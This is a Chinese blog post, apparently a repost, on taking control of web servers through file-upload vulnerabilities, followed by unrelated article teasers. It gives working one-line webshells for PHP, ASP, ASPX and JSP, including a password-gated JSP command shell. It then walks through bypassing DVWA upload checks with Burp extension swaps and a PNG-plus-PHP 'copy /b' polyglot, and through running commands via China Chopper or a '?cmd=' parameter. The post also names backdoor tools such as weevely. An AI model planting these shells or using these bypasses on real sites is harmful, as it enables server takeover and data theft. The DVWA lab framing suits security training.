利用网站上传漏洞使用一句话木马控制服务器

news/2024/5/9 15:23:01/文章来源:https://blog.csdn.net/weixin_33962621/article/details/93220005

一句话木马

常用于php、asp、aspx

php

<?php echo shell_exec($_GET['cmd']);?>

asp

<%execute(request("value"))%>

aspx

<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>

jsp

无回显执行系统命令

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

请求:http://192.168.16.240:8080/Shell/cmd2.jsp?cmd=ls

执行之后不会有任何回显,用来反弹个shell很方便。

有回显带密码验证的

<%if("123".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
%>

请求:http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=123&cmd=ls /

上传文件

通过Burp Suite绕过前端验证文件格式,通过修改数据包通过后端检验。

安全级别Low

前后端没有任何验证

安全级别Medium

仅前端判断文件后缀名

当前端提示不能发送非jpg、png格式时,Burp Suite配置好Proxy -》 Options,并在Proxy-》Intercept-》Intercept is on,浏览器设置代理为Options中的配置

首先把shell.php后缀改为jpg,然后提交,在filename中把文件shell.jpg后缀改为shell.php

安全级别High

准备一个图片和shell.php脚本,windows下运行

copy 1.png/b+shell.php/a shell.png

将图片上传后,使用中国菜刀连接(中国菜刀可以把图片当成php执行)

访问

这里以php的 <?php echo shell_exec($_GET['cmd']);?> 为例子

访问一句话木马文件(要知道上传的文件目录)

http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=ls

php中的cmd是参数

可以看到cmd参数为ls是直接查询当前目录下的文件

同样可以操作其他目录文件

其他kali下的web后门工具

webacoo

仅适用于php

weevely

仅适用于php

参考

https://blog.csdn.net/weixin_39190897/article/details/86771918

转载于:https://www.cnblogs.com/aeolian/p/11041052.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_756312.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

网站服务器购买配置选购方案

云服务器 的配置选择&#xff0c;和网站或应用的类型、访问量、数据量大小、程序质量等因素有关&#xff0c;建议和您的网站或应用的开发技术人员沟通&#xff0c;选择最适合您的配置。 如果您没有技术人员可提供建议&#xff0c;可以参考我们的建议进行配置选择。网站初始阶段…

惊爆:Alexa 全球排名网站即将关闭

作者 | 辛晓亮近日&#xff0c;亚马逊宣布&#xff0c;计划于明年 5 月份关其全球网站排名网站 Alexa。目前 Alexa 已经停止付费服务的新用户注册&#xff0c;现有付费用户可以使用到 2022 年 5 月 1 日。Alexa 在官方公告中称“25 年前&#xff0c;我们创立了 Alexa Internet&…

大型网站技术架构(六)网站的伸缩性架构

2019独角兽企业重金招聘Python工程师标准>>> 网站系统的伸缩性架构最重要的技术手段就是使用服务器集群功能&#xff0c;通过不断地向集群中添加服务器来增强整个集群的处理能力。“伸”即网站的规模和服务器的规模总是在不断扩大。 1、网站架构的伸缩性设计 网站的…

大型网站技术架构(二)架构模式

2019独角兽企业重金招聘Python工程师标准>>> 每一个模式描述了一个在我们周围不断重复发生的问题及该问题解决方案的核心。这样&#xff0c;你就能一次又一次地使用该方案而不必做重复工作。 所谓网站架构模式即为了解决大型网站面临的高并发访问、海量数据、高可靠…

抓取Bing每日图片作为网站首页背景

把Bing搜索的背景图片设置为自己网站的背景&#xff0c;实现背景及资讯的每日更新 效果图如下&#xff1a; 理一下思路&#xff0c;首先我们要抓取Bing的每日图片及最新资讯&#xff0c;然后保存图片及信息到本地&#xff0c;最后显示图片及资讯到网站首页。 第一步&#xff1a…

.NET Core 控制台如何嵌入运行 Web API网站?

【导读】我们知道在.NET Framework中可以嵌入运行Web APi&#xff0c;那么在.NET Core&#xff08;.NET 6称之为.NET&#xff09;中如何内嵌运行Web Api呢&#xff0c;在实际项目中这种场景非常常见&#xff0c;那么我们本节以.NET 6.0作为演示示例一起来瞅瞅。内嵌运行.NET Co…

【问题解决】Chrome浏览器:该网站使用HSTS。网络错误...此页面稍后可能会工作之解决方法

【问题解决】Chrome浏览器&#xff1a;该网站使用HSTS。网络错误…此页面稍后可能会工作之解决方法 原文地址&#xff1a; https://blog.csdn.net/weixin_43486390/article/details/96860374 这里我偷懒了&#xff0c;直接把别人解决过的方法直接搬过来了&#xff0c;不过&…

源码托管网站推荐——OKSvn

在团队开发时&#xff0c;没使用SVN或者其他版本控制工具必将带来很多不必要的麻烦。在本机搭建SVN的方法虽然可行&#xff0c;但你不能保证你的电脑一直处于运行状态&#xff0c;显然是很不方便的。 我们知道&#xff0c;新浪、谷歌都有项目托管&#xff0c;由于网速不给力&am…

建站手册-网站构建:万维网联盟(World Wide Web Consortium)

ylbtech-建站手册-网站构建&#xff1a;万维网联盟&#xff08;World Wide Web Consortium&#xff09;1.返回顶部 1、http://www.w3school.com.cn/site/site_w3c.asp2、2.返回顶部1、万维网联盟&#xff08;W3C&#xff09;创立了 WWW 标准。 W3C 的使命是通过发展规范、指导方…

数据分析案例(5)利用MYSQL+Python对某网站的用户数进行分析

数据与代码链接&#xff1a; https://pan.baidu.com/s/1vF3hzzI83tDDVl-kM03shQ 提取码&#xff1a;0202 user.sql文件大家自行导入mysql数据库中&#xff0c;我是放在了test01数据库中 数据由于是存储在MYsql数据库的&#xff0c;因此我们需要利用Python连接mysql数据库&…

discuz html5 手机,Discuz正式推出移动端社区建站工具Discuz Q

从黯然离场到二次上线&#xff0c;Discuz近期正式上线移动端社区建站软件Discuz Q&#xff0c;鼎力支持站长专属私域流量经营!了解到&#xff0c;Discuz! Q简单讲就是一套手机端的社区建站软件&#xff0c;核心就是帮助站长经营移动端私域流量&#xff0c;快速内容变现 &#x…

微信网站防屏蔽防红的措施以及微信域名检测API等工具的技术原理

为什么关心这种技术&#xff1f;因为我经常听到身边搞微商、搞微信项目的朋友都在叫苦连天&#xff0c;由于微信域名屏蔽、微信域名被拦截、弄得他们尸横遍野&#xff0c;损失的连过年回家的路费都没了&#xff0c;曾经的叱咤风云一下变成了今日的倒亏损。腾讯对微信中推广活动…

数字藏品交易平台开发 数字藏品交易网站开发

“数字藏品是运用电子信息技术促进文化艺术&#xff0c;尤其是传统式文化创意产业概率界限的移位&#xff0c;是推动文化创意产业使用价值和价值活起來的媒介。"12月21日&#xff0c;河北省博物院副院长赵志良在“用数赋智推动中华文化艺术创造力转换、创新能力发展趋势&q…

区块链nft网站开发 NFT数字藏品网站开发

虽然NFT自从2017年以来一直存在&#xff0c;NFT他们最初被用于加密社区内的边缘例&#xff08;收集加密猫&#xff09;。然而四年了&#xff0c;我们见证了艺术家&#xff0c;设计师&#xff0c;游戏开发者&#xff0c;音乐家和作家对这项技术的采用&#xff0c;在DEFI出现之前…

java中添加音乐_[Java教程]如何在网站中添加音乐

[Java教程]如何在网站中添加音乐0 2014-10-19 17:00:42来源&#xff1a;http://www.ido321.com/1042.html发现有很多的个人博客中添加了背景音乐&#xff0c;以增强用户体验。LZ搜集到了两种在网站中添加音乐的方式。一、豆瓣的FM这个非常简单&#xff0c;一段代码就可以实现。…

藏头诗php网站源码,四、中英翻译、歌词、藏头诗、智能聊天

中英翻译、歌词、藏头诗、智能聊天此章接口都来源于:http://api.ajaxsns.com/ ,感谢作者的无私奉献。先看效果图代码如下:1、共同方法private function _ajaxsns_comm($msg){$paramarray("key" > "free","appid" > "0","ms…

3.在Visual Studio 2017 下创建ASP.NET网站程序

1.文件——新建——项目 2.在新弹出来的窗口上选择Visual C#&#xff0c;然后选择ASP.NET Web 应用程序&#xff08;.NET Framework&#xff09;,然后点击确定 这里要注意下面的名称&#xff0c;位置&#xff0c;方案名称&#xff0c;需要改的就改了吧&#xff0c;新手还是一切…

存储过程可重用的代码块_GitHub推出新功能Actions,直接网站上构建、共享和执行代码...

​【新智元导读】GitHub推出了一个新版本的GitHub Actions测试版&#xff0c;内置了持续集成和交付功能。GitHub表示&#xff0c;它现在拥有4000多万用户。GitHub Actions是一个用于GitHub的因果关系的API&#xff0c;即基于任何事件协调任何工作流&#xff0c;与此同时GitHub负…

网页左侧导航栏点击怎么显示右侧内容_网站导航条应该怎么设计才比较易用

企业在做网站建设的时候需要&#xff0c;导航条是一个关键部分&#xff0c;一个明了易用的网站导航条能让用户在浏览网站的时候快速明确找到自己想要的页面&#xff0c;相当于网站的指路牌&#xff0c;所以导航条需要重点设计。那么如何才能设计出简单易用的网站导航条呢&#…

博文视点大讲堂41期-SEO难点之网站内部链接结构

博文视点大讲堂41期 SEO难点之网站内部链接结构 SEO是什么&#xff1f; 虽然这些年SEO概念普及了&#xff0c;但在很多人眼里&#xff0c;SEO和作弊、欺骗是一回事儿。这是对SEO的极大误解。 SEO是个强有力的工具&#xff0c;能以很合理的方式进行&#xff0c;既照顾到用户需求…